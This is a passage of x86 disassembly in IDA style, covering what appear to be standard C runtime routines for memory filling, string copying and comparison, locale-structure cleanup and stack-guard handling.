cmp ecx, ebx
jz short loc_41AD1C
movzx ax, al
mov [ecx], ax
loc_41AD1C: ; CODE XREF: sub_41ACDB+38�j
; sub_41ACDB+AB�j
xor eax, eax
inc eax
jmp short loc_41AD01
; ---------------------------------------------------------------------------
loc_41AD21: ; CODE XREF: sub_41ACDB+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41AD6A
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41AD58
cmp [ebp+arg_C], eax
jl short loc_41AD58
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call ds:dword_41F0A8
test eax, eax
jnz short loc_41AD65
loc_41AD58: ; CODE XREF: sub_41ACDB+59�j
; sub_41ACDB+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41AD88
cmp [edi+1], bl
jz short loc_41AD88
loc_41AD65: ; CODE XREF: sub_41ACDB+7B�j
mov eax, [esi+28h]
jmp short loc_41AD01
; ---------------------------------------------------------------------------
loc_41AD6A: ; CODE XREF: sub_41ACDB+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call ds:dword_41F0A8
test eax, eax
jnz short loc_41AD1C
loc_41AD88: ; CODE XREF: sub_41ACDB+83�j
; sub_41ACDB+88�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41AD01
sub_41ACDB endp
; =============== S U B R O U T I N E =======================================
sub_41AD9B proc near ; CODE XREF: sub_41554C+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41ADB0
call sub_41628E
loc_41ADB0: ; CODE XREF: sub_41AD9B+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41ACDB
add esp, 10h
retn
sub_41AD9B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41ADD0 proc near ; CODE XREF: sub_41554C+512�p
; sub_418035+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41AE2B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41AE1B
neg ecx
and ecx, 3
jz short loc_41ADFD
sub edx, ecx
loc_41ADF3: ; CODE XREF: sub_41ADD0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41ADF3
loc_41ADFD: ; CODE XREF: sub_41ADD0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41AE1B
rep stosd
test edx, edx
jz short loc_41AE25
loc_41AE1B: ; CODE XREF: sub_41ADD0+18�j
; sub_41ADD0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41AE1B
loc_41AE25: ; CODE XREF: sub_41ADD0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41AE2B: ; CODE XREF: sub_41ADD0+A�j
mov eax, [esp+arg_0]
retn
sub_41ADD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE30 proc near ; CODE XREF: sub_41554C+4DC�p
; sub_4182E4+FD�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_412DD0
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_41F1B8
test eax, eax
jz short loc_41AEC5
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call ds:dword_41F1B4
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_479E5C
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_41AEC5
cmp eax, 1
jz short loc_41AEDD
mov ebx, edi
mov edi, 1000h
loc_41AE9A: ; CODE XREF: sub_41AE30+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_41F1B8
test eax, eax
jz short loc_41AEC5
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_41AE9A
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_41AEC1
xor eax, eax
inc eax
jmp short loc_41AEF9
; ---------------------------------------------------------------------------
loc_41AEC1: ; CODE XREF: sub_41AE30+8A�j
cmp esi, ebx
jnb short loc_41AEC9
loc_41AEC5: ; CODE XREF: sub_41AE30+22�j
; sub_41AE30+5C�j ...
xor eax, eax
jmp short loc_41AEF9
; ---------------------------------------------------------------------------
loc_41AEC9: ; CODE XREF: sub_41AE30+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call ds:dword_41F174
mov eax, dword_479E5C
jmp short loc_41AEDF
; ---------------------------------------------------------------------------
loc_41AEDD: ; CODE XREF: sub_41AE30+61�j
mov ebx, esi
loc_41AEDF: ; CODE XREF: sub_41AE30+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call ds:dword_41F1B0
loc_41AEF9: ; CODE XREF: sub_41AE30+8F�j
; sub_41AE30+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_41AE30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF01 proc near ; CODE XREF: sub_41608B+60�p
; sub_4190C6+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_428408
call __SEH_prolog
xor esi, esi
cmp dword_47A13C, esi
jnz short loc_41AF4C
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_427ECC
push edi
call ds:dword_41F1C0
test eax, eax
jz short loc_41AF37
mov dword_47A13C, edi
jmp short loc_41AF4C
; ---------------------------------------------------------------------------
loc_41AF37: ; CODE XREF: sub_41AF01+2C�j
call ds:dword_41F008
cmp eax, 78h
jnz short loc_41AF4C
mov dword_47A13C, 2
loc_41AF4C: ; CODE XREF: sub_41AF01+14�j
; sub_41AF01+34�j ...
mov eax, dword_47A13C
cmp eax, 2
jz loc_41B044
cmp eax, esi
jz loc_41B044
cmp eax, 1
jnz loc_41B06A
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41AF7E
mov eax, dword_47A188
mov [ebp+arg_10], eax
loc_41AF7E: ; CODE XREF: sub_41AF01+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call ds:dword_41F0A8
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41B06A
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41ADD0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41AFEF
; ---------------------------------------------------------------------------
loc_41AFDA: ; DATA XREF: .rdata:stru_428408�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AFDE: ; DATA XREF: .rdata:stru_428408�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41AFEF: ; CODE XREF: sub_41AF01+D7�j
test esi, esi
jnz short loc_41B00A
push edi
push 2
call sub_41AB01
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41B06A
mov [ebp+var_24], 1
loc_41B00A: ; CODE XREF: sub_41AF01+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_41F0A8
test eax, eax
jz short loc_41B032
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_41F1C0
mov [ebp+var_20], eax
loc_41B032: ; CODE XREF: sub_41AF01+11E�j
cmp [ebp+var_24], 0
jz short loc_41B03F
push esi
call sub_412FE4
pop ecx
loc_41B03F: ; CODE XREF: sub_41AF01+135�j
mov eax, [ebp+var_20]
jmp short loc_41B0B2
; ---------------------------------------------------------------------------
loc_41B044: ; CODE XREF: sub_41AF01+53�j
; sub_41AF01+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41B051
mov ebx, dword_47A178
loc_41B051: ; CODE XREF: sub_41AF01+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41B05E
mov edi, dword_47A188
loc_41B05E: ; CODE XREF: sub_41AF01+155�j
push ebx
call sub_41CB47
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41B06E
loc_41B06A: ; CODE XREF: sub_41AF01+64�j
; sub_41AF01+A5�j ...
xor eax, eax
jmp short loc_41B0B2
; ---------------------------------------------------------------------------
loc_41B06E: ; CODE XREF: sub_41AF01+167�j
cmp eax, edi
jz short loc_41B090
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_41CB90
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41B06A
mov [ebp+arg_4], esi
loc_41B090: ; CODE XREF: sub_41AF01+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_41F1BC
mov edi, eax
test esi, esi
jz short loc_41B0B0
push esi
call sub_412FE4
pop ecx
loc_41B0B0: ; CODE XREF: sub_41AF01+1A6�j
mov eax, edi
loc_41B0B2: ; CODE XREF: sub_41AF01+141�j
; sub_41AF01+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41AF01 endp
; =============== S U B R O U T I N E =======================================
sub_41B0BB proc near ; CODE XREF: sub_416102+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41B249
push dword ptr [esi+4]
call sub_412FE4
push dword ptr [esi+8]
call sub_412FE4
push dword ptr [esi+0Ch]
call sub_412FE4
push dword ptr [esi+10h]
call sub_412FE4
push dword ptr [esi+14h]
call sub_412FE4
push dword ptr [esi+18h]
call sub_412FE4
push dword ptr [esi]
call sub_412FE4
push dword ptr [esi+20h]
call sub_412FE4
push dword ptr [esi+24h]
call sub_412FE4
push dword ptr [esi+28h]
call sub_412FE4
push dword ptr [esi+2Ch]
call sub_412FE4
push dword ptr [esi+30h]
call sub_412FE4
push dword ptr [esi+34h]
call sub_412FE4
push dword ptr [esi+1Ch]
call sub_412FE4
push dword ptr [esi+38h]
call sub_412FE4
push dword ptr [esi+3Ch]
call sub_412FE4
add esp, 40h
push dword ptr [esi+40h]
call sub_412FE4
push dword ptr [esi+44h]
call sub_412FE4
push dword ptr [esi+48h]
call sub_412FE4
push dword ptr [esi+4Ch]
call sub_412FE4
push dword ptr [esi+50h]
call sub_412FE4
push dword ptr [esi+54h]
call sub_412FE4
push dword ptr [esi+58h]
call sub_412FE4
push dword ptr [esi+5Ch]
call sub_412FE4
push dword ptr [esi+60h]
call sub_412FE4
push dword ptr [esi+64h]
call sub_412FE4
push dword ptr [esi+68h]
call sub_412FE4
push dword ptr [esi+6Ch]
call sub_412FE4
push dword ptr [esi+70h]
call sub_412FE4
push dword ptr [esi+74h]
call sub_412FE4
push dword ptr [esi+78h]
call sub_412FE4
push dword ptr [esi+7Ch]
call sub_412FE4
add esp, 40h
push dword ptr [esi+80h]
call sub_412FE4
push dword ptr [esi+84h]
call sub_412FE4
push dword ptr [esi+88h]
call sub_412FE4
push dword ptr [esi+8Ch]
call sub_412FE4
push dword ptr [esi+90h]
call sub_412FE4
push dword ptr [esi+94h]
call sub_412FE4
push dword ptr [esi+98h]
call sub_412FE4
push dword ptr [esi+9Ch]
call sub_412FE4
push dword ptr [esi+0A0h]
call sub_412FE4
push dword ptr [esi+0A4h]
call sub_412FE4
push dword ptr [esi+0A8h]
call sub_412FE4
add esp, 2Ch
loc_41B249: ; CODE XREF: sub_41B0BB+7�j
pop esi
retn
sub_41B0BB endp
; =============== S U B R O U T I N E =======================================
sub_41B24B proc near ; CODE XREF: sub_416102+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41B2A8
mov eax, [esi]
mov ecx, off_42D194
cmp eax, [ecx]
jz short loc_41B26F
cmp eax, off_42D164
jz short loc_41B26F
push eax
call sub_412FE4
pop ecx
loc_41B26F: ; CODE XREF: sub_41B24B+13�j
; sub_41B24B+1B�j
mov eax, [esi+4]
mov ecx, off_42D194
cmp eax, [ecx+4]
jz short loc_41B28C
cmp eax, off_42D168
jz short loc_41B28C
push eax
call sub_412FE4
pop ecx
loc_41B28C: ; CODE XREF: sub_41B24B+30�j
; sub_41B24B+38�j
mov esi, [esi+8]
mov eax, off_42D194
cmp esi, [eax+8]
jz short loc_41B2A8
cmp esi, off_42D16C
jz short loc_41B2A8
push esi
call sub_412FE4
pop ecx
loc_41B2A8: ; CODE XREF: sub_41B24B+7�j
; sub_41B24B+4C�j ...
pop esi
retn
sub_41B24B endp
; =============== S U B R O U T I N E =======================================
sub_41B2AA proc near ; CODE XREF: sub_416102+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41B381
mov eax, [esi+0Ch]
mov ecx, off_42D194
cmp eax, [ecx+0Ch]
jz short loc_41B2D4
cmp eax, off_42D170
jz short loc_41B2D4
push eax
call sub_412FE4
pop ecx
loc_41B2D4: ; CODE XREF: sub_41B2AA+19�j
; sub_41B2AA+21�j
mov eax, [esi+10h]
mov ecx, off_42D194
cmp eax, [ecx+10h]
jz short loc_41B2F1
cmp eax, off_42D174
jz short loc_41B2F1
push eax
call sub_412FE4
pop ecx
loc_41B2F1: ; CODE XREF: sub_41B2AA+36�j
; sub_41B2AA+3E�j
mov eax, [esi+14h]
mov ecx, off_42D194
cmp eax, [ecx+14h]
jz short loc_41B30E
cmp eax, off_42D178
jz short loc_41B30E
push eax
call sub_412FE4
pop ecx
loc_41B30E: ; CODE XREF: sub_41B2AA+53�j
; sub_41B2AA+5B�j
mov eax, [esi+18h]
mov ecx, off_42D194
cmp eax, [ecx+18h]
jz short loc_41B32B
cmp eax, off_42D17C
jz short loc_41B32B
push eax
call sub_412FE4
pop ecx
loc_41B32B: ; CODE XREF: sub_41B2AA+70�j
; sub_41B2AA+78�j
mov eax, [esi+1Ch]
mov ecx, off_42D194
cmp eax, [ecx+1Ch]
jz short loc_41B348
cmp eax, off_42D180
jz short loc_41B348
push eax
call sub_412FE4
pop ecx
loc_41B348: ; CODE XREF: sub_41B2AA+8D�j
; sub_41B2AA+95�j
mov eax, [esi+20h]
mov ecx, off_42D194
cmp eax, [ecx+20h]
jz short loc_41B365
cmp eax, off_42D184
jz short loc_41B365
push eax
call sub_412FE4
pop ecx
loc_41B365: ; CODE XREF: sub_41B2AA+AA�j
; sub_41B2AA+B2�j
mov esi, [esi+24h]
mov eax, off_42D194
cmp esi, [eax+24h]
jz short loc_41B381
cmp esi, off_42D188
jz short loc_41B381
push esi
call sub_412FE4
pop ecx
loc_41B381: ; CODE XREF: sub_41B2AA+7�j
; sub_41B2AA+C6�j ...
pop esi
retn
sub_41B2AA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B390 proc near ; CODE XREF: sub_417F13+60�p
; sub_419E4A+8F�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41B405
sub_41B390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B3A0 proc near ; CODE XREF: sub_419E4A+10B�p
; sub_419E4A+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41B3C0
loc_41B3AD: ; CODE XREF: sub_41B3A0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41B3F3
test ecx, 3
jnz short loc_41B3AD
mov edi, edi
loc_41B3C0: ; CODE XREF: sub_41B3A0+B�j
; sub_41B3A0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41B3C0
mov eax, [ecx-4]
test al, al
jz short loc_41B402
test ah, ah
jz short loc_41B3FD
test eax, 0FF0000h
jz short loc_41B3F8
test eax, 0FF000000h
jz short loc_41B3F3
jmp short loc_41B3C0
; ---------------------------------------------------------------------------
loc_41B3F3: ; CODE XREF: sub_41B3A0+14�j
; sub_41B3A0+4F�j
lea edi, [ecx-1]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B3F8: ; CODE XREF: sub_41B3A0+48�j
lea edi, [ecx-2]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B3FD: ; CODE XREF: sub_41B3A0+41�j
lea edi, [ecx-3]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B402: ; CODE XREF: sub_41B3A0+3D�j
lea edi, [ecx-4]
loc_41B405: ; CODE XREF: sub_41B390+5�j
; sub_41B3A0+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41B42E
loc_41B411: ; CODE XREF: sub_41B3A0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41B480
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41B411
jmp short loc_41B42E
; ---------------------------------------------------------------------------
loc_41B429: ; CODE XREF: sub_41B3A0+A6�j
; sub_41B3A0+C0�j
mov [edi], edx
add edi, 4
loc_41B42E: ; CODE XREF: sub_41B3A0+6F�j
; sub_41B3A0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41B429
test dl, dl
jz short loc_41B480
test dh, dh
jz short loc_41B477
test edx, 0FF0000h
jz short loc_41B46A
test edx, 0FF000000h
jz short loc_41B462
jmp short loc_41B429
; ---------------------------------------------------------------------------
loc_41B462: ; CODE XREF: sub_41B3A0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B46A: ; CODE XREF: sub_41B3A0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B477: ; CODE XREF: sub_41B3A0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B480: ; CODE XREF: sub_41B3A0+78�j
; sub_41B3A0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41B3A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41B4A4: ; CODE XREF: .text:0041B4B1�j
mov al, [edx]
or al, al
jz short loc_41B4B3
add edx, 1
bts [esp], eax
jmp short loc_41B4A4
; ---------------------------------------------------------------------------
loc_41B4B3: ; CODE XREF: .text:0041B4A8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_41B4BC: ; CODE XREF: .text:0041B4CC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41B4CE
add esi, 1
bt [esp], eax
jnb short loc_41B4BC
loc_41B4CE: ; CODE XREF: .text:0041B4C3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B4E0 proc near ; CODE XREF: sub_4186A0+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41B52C
loc_41B4F0: ; CODE XREF: sub_41B4E0+3C�j
; sub_41B4E0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41B524
or al, al
jz short loc_41B520
cmp ah, [ecx+1]
jnz short loc_41B524
or ah, ah
jz short loc_41B520
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41B524
or al, al
jz short loc_41B520
cmp ah, [ecx+3]
jnz short loc_41B524
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41B4F0
mov edi, edi
loc_41B520: ; CODE XREF: sub_41B4E0+18�j
; sub_41B4E0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41B524: ; CODE XREF: sub_41B4E0+14�j
; sub_41B4E0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41B52C: ; CODE XREF: sub_41B4E0+E�j
test edx, 1
jz short loc_41B54C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41B524
add ecx, 1
or al, al
jz short loc_41B520
test edx, 2
jz short loc_41B4F0
loc_41B54C: ; CODE XREF: sub_41B4E0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41B524
or al, al